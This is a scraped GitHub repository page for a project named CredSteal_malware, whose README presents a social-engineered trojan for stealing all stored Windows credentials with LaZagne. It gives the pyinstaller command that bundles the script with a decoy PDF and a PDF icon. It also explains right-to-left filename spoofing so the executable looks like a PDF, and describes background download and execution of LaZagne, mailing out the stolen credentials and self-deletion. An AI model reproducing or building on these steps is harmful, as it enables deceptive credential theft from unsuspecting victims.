Skip to content

Social engineered Malware Trojan to steal all stored credentials using LaZagne.exe from Windows.

Notifications You must be signed in to change notification settings

ananth-she11z/CredSteal_malware

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

Credential_Steal_malware

Social engineered Malware Trojan to steal all stored credentials using LaZagne.exe for Windows.

https://github.com/AlessandroZ/LaZagne

Pythom code convertion to EXE:

pyinstaller --add-data "hacking.pdf;." --onefile --noconsole --icon anypdflogo.ico malware.py

EXE to PDF extension spoofing:

Use kali tool characters right-to-left to spoof the file extension.

example: lfdp.exe -----> lexe.pdf once user opens lexe.pdf, a pdf will open as mentioned in pyinstaller and in background lazagne.exe will get downloaded, runs and send the loot in mail followed by deleting itself.

About

Social engineered Malware Trojan to steal all stored credentials using LaZagne.exe from Windows.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages